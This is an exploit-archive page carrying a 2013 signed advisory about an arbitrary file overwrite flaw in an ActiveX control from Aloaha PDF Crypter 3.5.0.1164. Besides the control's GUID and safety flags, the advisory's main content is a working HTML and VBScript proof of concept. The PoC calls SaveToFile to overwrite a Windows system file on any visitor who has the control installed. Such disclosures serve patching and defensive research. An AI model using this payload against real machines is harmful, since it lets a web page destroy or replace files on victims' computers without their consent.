exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Aloaha PDF Crypter 3.5.0.1164 File Overwrite

Aloaha PDF Crypter 3.5.0.1164 File Overwrite
Posted Jan 24, 2013
Authored by shinnai | Site shinnai.altervista.org

Aloaha PDF Crypter version 3.5.0.1164 suffers from an active-x arbitrary file overwrite vulnerability.

tags | exploit, arbitrary, activex
SHA-256 | 7fa8744017306fcb9f8b6287e11861e540f90887c71065266540838aa74a25cd

Aloaha PDF Crypter 3.5.0.1164 File Overwrite

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

============================================================================================
TITLE:
============================================================================================
Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite

url: http://www.aloaha.com/
download: http://www.aloaha.com/download/aloaha_crypter.zip
author: shinnai (http://shinnai.altervista.org)
============================================================================================
FILE INFO:
============================================================================================
File: C:\WINDOWS\system32\vbCrypt.dll
InternalName: ebCrypt
OriginalFilename: ebCrypt.DLL
FileVersion: 2.0.0.2087
FileDescription: ebCrypt Main Module
Product: ebCrypt
ProductVersion: 2.0.0.2087
Language: English (United States)
MD5 hash: b262cb93c555c3c9604502d071a783ec
============================================================================================
ACTIVEX INFO:
============================================================================================
ProgID: EbCrypt.eb_c_PRNGenerator.1
GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
Description: eb_c_PRNGenerator Class
Safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
============================================================================================
BUG:
============================================================================================
This activex contains the "SaveToFile" which could be used to overwite arbitrary files on
pc users.
============================================================================================
PROOF OF CONCEPT
============================================================================================
<html>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
<script language='vbscript'>
test.SaveToFile "c:\windows\_system.ini"
</script>
</html>
============================================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (MingW32)

iQIcBAEBAgAGBQJQ/6sFAAoJEJlK/ai8vywmSUUQAK38iSzcZ3JsD+Kskt1Zwvhc
hynADNu17uvlcaUoK7uFc8BwOkRT6XqlmJe6Gab02jPClkmaHRH0Oh8/Zxu8T5Y5
TsLrw7YgUFQDelS4zL7yxZIKofio3GVS55vo3JL1bJvKrANp99BYcQFX4t5539g9
l/kYf51QGhWXxEvYFlSpDZ8km8dCElLYTT47oFjXMFSpBHyodrU4MPh4FGLoN1XN
TLrYDOoTke+RXit/nzNKqbNzXIXmBVTBWfYdPLWwcc07Go4KR3tKGl1ELSCczHeg
PFWCbcJ18l56809afAviUUvrgb1g9WG9ZY5jMxXP1t5oqeeLJKfKhX0KipVtoBUa
dZZWJOLp6Mmi8VBzfkTu50jZy1B4EtUSTlmj5A2SKBQRM/0SSqZO1LjwE39fQ9gh
6avUHhPgV9OLqaWxVbNHy6RYBFYHlo46ytvIhgBDU0VPqwI50yyzrObxbRAhCD19
GjgSBtZqOJQ9sFwiXS+HHQcCt8ZR6pf09yWmxDr+1L7D4yKvq/Z2TsBuYKMUGazW
Xni6lxddI7LUN88LXlrV8cCoJ7R2gBe9Tg3nUBIDLpXM4hyeU1DTL0kFNATUk3P5
7xFde64BvKL2GAzEip8j9PuGhezfflIIhsxPHUEemOvsUctqXEQI8DtC0GkRaT3J
enDko6b3T5jOt6axrWGb
=H+Gh
-----END PGP SIGNATURE-----


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close